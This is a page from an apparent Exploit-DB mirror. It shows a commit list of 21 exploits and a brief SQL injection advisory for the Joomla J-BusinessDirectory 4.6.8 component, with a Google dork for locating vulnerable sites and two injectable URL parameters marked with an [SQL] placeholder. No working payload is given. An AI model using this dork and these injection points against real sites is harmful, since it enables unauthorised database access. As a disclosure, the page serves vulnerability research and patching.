bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/41411.txt
Offensive Security ad7bd81657 DB: 2017-02-22 
21 new exploits

Microsoft Office PowerPoint 2010 - 'MSO!Ordinal5429' Missing Length Check Heap Corruption
Microsoft Office PowerPoint 2010 - MSO/OART Heap Out-of-Bounds Access
Microsoft Office PowerPoint 2010 GDI - 'GDI32!ConvertDxArray' Insufficient Bounds Check
Adobe Flash - MP4 AMF Parsing Overflow
Adobe Flash - SWF Stack Corruption
Adobe Flash - Use-After-Free in Applying Bitmap Filter
Adobe Flash - YUVPlane Decoding Heap Overflow
DIGISOL DG-HR1400 Wireless Router - Cross-Site Request Forgery
Joomla! Component J-HotelPortal 6.0.2 - 'review_id' Parameter SQL Injection
Joomla! Component J-CruiseReservation Standard 3.0 - 'city' Parameter SQL Injection
Joomla! Component Eventix Events Calendar 1.0 - SQL Injection
Joomla! Component J-MultipleHotelReservation Standard 6.0.2 - 'review_id' Parameter SQL Injection
Joomla! Component Directorix Directory Manager 1.1.1 - SQL Injection
Joomla! Component Magic Deals Web 1.2.0 - SQL Injection
Joomla! Component J-BusinessDirectory 4.6.8 - SQL Injection
Joomla! Component AppointmentBookingPro 4.0.1 - SQL Injection
Sophos Web Appliance 4.2.1.3 - block/unblock Remote Command Injection (Metasploit)
Sophos Web Appliance 4.2.1.3 - DiagnosticTools Remote Command Injection (Metasploit)
Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit)
Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit)
AlienVault OSSIM/USM <= 5.3.1 - Remote Code Execution (Metasploit)
2017-02-22 05:01:19 +00:00

19 lines
No EOL
789 B
Text
Executable file
Raw Blame History

# # # # #
# Exploit Title: Joomla! Component J-BusinessDirectory v4.6.8 - SQL Injection
# Google Dork: inurl:index.php?option=com_jbusinessdirectory
# Date: 21.02.2017
# Vendor Homepage: http://www.cmsjunkie.com/
# Software Buy: http://www.cmsjunkie.com/ajax/index/options/product_id/73/
# Demo: http://demo.cmsjunkie.com/j-businessdirectory/
# Version: 4.6.8
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jbusinessdirectory&view=companies&companyId=[SQL]
# http://localhost/[PATH]/index.php?option=com_jbusinessdirectory&view=search&searchkeyword=1&categoryId=[SQL]
# Etc...
# # # # #
Reference in a new issue View git blame Copy permalink